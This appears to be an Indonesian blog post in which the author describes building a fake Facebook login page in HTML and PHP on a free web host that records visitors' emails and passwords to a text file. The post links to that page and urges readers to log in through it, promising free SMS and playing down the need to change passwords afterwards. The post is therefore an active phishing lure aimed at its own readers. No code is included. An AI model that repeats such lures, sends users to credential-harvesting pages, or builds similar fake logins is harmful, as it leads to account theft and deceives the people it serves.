Belajar Nge-hack facebook ( megetahui pasword and e-mail facebook dari link masuk ke facebook yang kita kirim )

Aku baru saja ketemu temen yang kuliah di wearnes education center, sempat ngobrol ma dia tentang ilmu php. si dia mau berbagi ilmu buat nge-hack facbook orang.

Dari acara ngobrol tersebut, aku jadi pengen banget belajar ngehack faCebook temen, meski gak bakal aku gunain untuk hal-hal yang negatif. hanya buat pembelajaran saja.

gue langsung googling cara ngehack facebook tersebut.., dari artikel-artikel yang aku baca, akhirnya gue coba buat program berbahasa html. php dan txt yang ak masukin ke www.ripway.com Dan aku dapet link untuk menyebar halaman masuk facebook hack tersebut.

nih halamannya: http://h1.ripway.com/tanguevara/facebook/facebook.html

setelah kalian buka tu halaman, psati ada konfirmasi untuk masuk ke facebook, nah saat itu saya bisa tau e-mail dan pasword kalian yang dikirim melalui ke php yang aku buat dan terbaca di txt'nya. Sory klo bahasa pemogramannya ngawur, soalnya itu yang diajarin temen aku tadi.. he..

klo kalian masuk facebook dari halaman tersebut kalian bisa lho sms ke temen secara gratis dari aplikasi facebook tersebut.

Jadi sambil facebook'an kita bisa sms'an gratis.., hahahaaa..

jangan lupa ganti paword klo udah login lewat tu link ya..., tapi gak ganti juga gak apa2. coz, aku gak bakal macem-macemin facebook kamu kok.. he..

masuk aja facebook dari sini, biarbisa sms gratis sepuasnya..,,, login facebook klo gak percaya silahkan dicoba, kemudian coment dipostigan ini, dan saya akan kirim e-mail ke kalian tentang akun facebook kalian. beserta cara ngehack facebook. tapi jangan digunakan macam-macam.. he..

0 komentar:

Post a Comment